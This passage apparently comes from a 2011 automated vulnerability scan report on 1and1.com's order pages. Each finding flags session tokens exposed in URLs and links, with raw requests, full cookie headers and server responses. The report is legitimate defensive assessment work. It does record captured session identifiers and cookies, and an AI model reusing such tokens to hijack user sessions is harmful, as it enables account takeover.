Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:36:33 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/PrivacyPolicy?__frame=_top&__lf=Static&linkOrigin=Home&linkId=ft.nav.privacypolicy
Content-Length: 0
Connection: close
Content-Type: text/plain


3.90. http://order.1and1.com/xml/order/Server  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/Server

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/Server;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&linkOrigin=Hosting&linkId=hd.nav.server HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:33:35 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=vZ1wsLzAmT09mYHNpcDZuaDUnMWpdVy9GOTMbHxwcGzAyMC0tMC8pLDAjJSQjIEUzX1RWZBweMGA5Y3I4KywoJywoJiknISkgHyhgYSczOmpzOSwtKSgtKicqJSgpIiM=; Expires=Fri, 07-Apr-2079 21:47:42 GMT; Path=/
ETag: 1e80e3a593b677388759f6eb9a792645
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 20244


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...

3.91. http://order.1and1.com/xml/order/Server  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/Server

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /xml/order/Server;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&linkOrigin=Hosting&linkId=hd.nav.server HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:33:35 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=vZ1wsLzAmT09mYHNpcDZuaDUnMWpdVy9GOTMbHxwcGzAyMC0tMC8pLDAjJSQjIEUzX1RWZBweMGA5Y3I4KywoJywoJiknISkgHyhgYSczOmpzOSwtKSgtKicqJSgpIiM=; Expires=Fri, 07-Apr-2079 21:47:42 GMT; Path=/
ETag: 1e80e3a593b677388759f6eb9a792645
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 20244


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...
<div id="header"><a class="core_button_normal" href="/xml/order/Jumpto;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkId=hd.log.eue&amp;site=PU.WH.US&amp;origin.page=Server&amp;linkOrigin=Server&amp;linkId=hd.log.eue" rel="redirectlink-hd-log-eue"><img alt="1&amp;1 Internet AG" id="header_logo" src="/modules/frontend-skin-odin/img/frontend-skin-odin/header/logo_1and1.png" class="alphapng">
...[SNIP]...
<li class="dropdown left first_item"><a class="core_button_normal" href="/xml/order/Home;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkOrigin=Server&amp;linkId=hd.nav.home" rel="button-hd-nav-home">Home</a></li><li class="dropdown left"><a class="core_button_normal" href="/xml/order/Instant;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkOrigin=Server&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">Domains</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Instant;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkOrigin=Server&amp;linkId=hd.nav.domainSearch" rel="button-hd-nav-domainSearch">Domain Search</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/DomaininfoMove;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkOrigin=Server&amp;linkId=hd.nav.domainTransfer" rel="button-hd-nav-domainTransfer">Domain Transfer</a>
...[SNIP]...
<li class="dropdown left"><a class="core_button_normal" href="/xml/order/Mail;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkOrigin=Server&amp;linkId=hd.nav.mail" rel="button-hd-nav-mail">Mail</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/MailInstantMail;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkOrigin=Server&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">Instant Mail</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/MailXchange;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkOrigin=Server&amp;linkId=hd.nav.ecommerce" rel="button-hd-nav-ecommerce">1&amp;1 MailXchange</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/MicrosoftExchange;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkOrigin=Server&amp;linkId=hd.nav.mail" rel="button-hd-nav-mail">Microsoft&reg; Exchange</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Hosting;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkOrigin=Server&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">Linux Hosting</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/MsHosting;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkOrigin=Server&amp;linkId=hd.nav.mail" rel="button-hd-nav-mail">Microsoft Hosting</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Jumpto;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkId=ngh&amp;site=PU.NGH.US&amp;origin.page=Server&amp;page=switch&amp;linkOrigin=Server&amp;linkId=ngh" rel="redirectlink-ngh">
MyBusiness Site
</a>
...[SNIP]...
<li class="dropdown left"><a class="core_button_normal" href="/xml/order/Eshops;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkOrigin=Server&amp;linkId=hd.nav.ecommerce" rel="button-hd-nav-ecommerce">eCommerce</a></li><li class="dropdown left"><a class="core_button_normal" href="/xml/order/Server;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkOrigin=Server&amp;linkId=hd.nav.server">Servers</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/ServerPremium;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkOrigin=Server&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">1&amp;1 Dedicated Servers</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/CloudDynamicServer;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkOrigin=Server&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">
1&amp;1 Dynamic Cloud Server
</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/VirtualServer;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkOrigin=Server&amp;linkId=hd.nav.mail" rel="button-hd-nav-mail">1&amp;1 Virtual Servers</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/LocalSubmission;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkOrigin=Server&amp;linkId=hd.nav.listlocal" rel="button-hd-nav-listlocal">ListLocal</a></li><li><a class="core_button_normal" href="/xml/order/Sharepoint;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkOrigin=Server&amp;linkId=hd.nav.sharepoint" rel="button-hd-nav-sharepoint">Microsoft&reg; Sharepoint&reg;</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/VirtualServer;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkOrigin=Server&amp;linkId=hd.tab.vps" rel="button-hd-tab-vps"><span>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/CloudDynamicServer;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkOrigin=Server&amp;linkId=hd.tab.cds" rel="button-hd-tab-cds"><span>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/ServerPremium;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkOrigin=Server&amp;linkId=hd.tab.serverpremium" rel="button-hd-tab-serverpremium"><span>
...[SNIP]...
<li style="float:right;"><a class="auswahl" href="/xml/order/costs;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkOrigin=Server&amp;linkId=hd.tab.yourcart" rel="button-hd-tab-yourcart" title="Ihre Auswahl im &Uuml;berblick (Warenkorb)"><span>
...[SNIP]...
</span><a class="btn btn-yellow-large btn-pos" href="/xml/order/ServerPremium;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkOrigin=Server&amp;linkId=weiter" rel="button-weiter"><span>
...[SNIP]...
</ul><a class="btn btn-blue-large btn-pos" href="/xml/order/CloudDynamicServer;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkOrigin=Server&amp;linkId=weiter" rel="button-weiter"><span>
...[SNIP]...
</ul><a class="btn btn-blue-large btn-pos" href="/xml/order/VirtualServer;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkOrigin=Server&amp;linkId=weiter" rel="button-weiter"><span>
...[SNIP]...
<br><a class="core_button_normal" href="/xml/order/TcSpecialOffers;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top">Click here</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/AboutUs;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkOrigin=Server&amp;linkId=hd.nav.about" rel="button-hd-nav-about">
About 1&amp;1
</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Jumpto;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkId=ft.nav.pressroom&amp;site=ST.PRE.US&amp;origin.page=Server&amp;linkOrigin=Server&amp;linkId=ft.nav.pressroom" rel="redirectlink-ft-nav-pressroom">
Press Room
</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Gtc;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkOrigin=Server&amp;linkId=ft.nav.tandc" rel="button-ft-nav-tandc">
T&amp;C
</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/PrivacyPolicy;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkOrigin=Server&amp;linkId=ft.nav.privacypolicy" rel="button-ft-nav-privacypolicy">
Privacy Policy
</a>
...[SNIP]...
<li><a rel="height=512, width=683" class="window-open" href="/xml/order/TellAFriend;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkOrigin=Server&amp;linkId=ft.nav.tellafriend&amp;linkType=txt">
Tell a friend
</a>
...[SNIP]...

3.92. http://order.1and1.com/xml/order/ServerPremium  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/ServerPremium

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/ServerPremium;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&__lf=Static HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:33:35 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/ServerPremium?__frame=_top&__lf=Static
Content-Length: 0
Connection: close
Content-Type: text/plain


3.93. http://order.1and1.com/xml/order/Service  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/Service

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/Service;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&__lf=Static HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:37:30 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/Service?__frame=_top&__lf=Static
Content-Length: 0
Connection: close
Content-Type: text/plain


3.94. http://order.1and1.com/xml/order/Sharepoint  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/Sharepoint

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/Sharepoint;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&__lf=Static&linkOrigin=Home&linkId=hd.nav.sharepoint HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:34:28 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/Sharepoint?__frame=_top&__lf=Static&linkOrigin=Home&linkId=hd.nav.sharepoint
Content-Length: 0
Connection: close
Content-Type: text/plain


3.95. http://order.1and1.com/xml/order/TcSpecialOffers  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/TcSpecialOffers

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/TcSpecialOffers;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&__lf=Static HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:35:57 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/TcSpecialOffers?__frame=_top&__lf=Static
Content-Length: 0
Connection: close
Content-Type: text/plain


3.96. http://order.1and1.com/xml/order/TellAFriend  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/TellAFriend

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/TellAFriend;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&__lf=Static&linkOrigin=Home&linkId=ft.nav.tellafriend&linkType=txt HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:36:58 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/TellAFriend?__frame=_top&__lf=Static&linkOrigin=Home&linkId=ft.nav.tellafriend&linkType=txt
Content-Length: 0
Connection: close
Content-Type: text/plain


3.97. http://order.1and1.com/xml/order/VirtualServer  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/VirtualServer

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /xml/order/VirtualServer;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&__lf=Order-Tariff&linkOrigin=CloudDynamicServer&linkId=hd.tab.vps HTTP/1.1
Host: order.1and1.com
Proxy-Connection: keep-alive
Referer: http://order.1and1.com/xml/order/CloudDynamicServer;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&__lf=Static&linkOrigin=MsHosting&linkId=hd.nav.domains
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: backpage=Hosting; ucuo=20110320183236-002.TCpfix141a; lastpage=CloudDynamicServer; ac-whom-us=OM.US.USa02K18619H7072a; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; __PFIX_TST_=6185bdfc6163d400; UT=YZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:30:AAABLtRnZNPcSJFdN9f55FNyE*t5Qv64:1300643669203; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 17:54:16 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=yZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; Expires=Fri, 07-Apr-2079 21:08:23 GMT; Path=/
ETag: dd3a6908188586141eb93efcd06408c1
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 25297


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...
<div id="header"><a class="core_button_normal" href="/xml/order/Jumpto;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkId=hd.log.eue&amp;site=PU.WH.US&amp;origin.page=VirtualServer&amp;linkOrigin=VirtualServer&amp;linkId=hd.log.eue" rel="redirectlink-hd-log-eue"><img alt="1&amp;1 Internet AG" id="header_logo" src="/modules/frontend-skin-odin/img/frontend-skin-odin/header/logo_1and1.png" class="alphapng">
...[SNIP]...
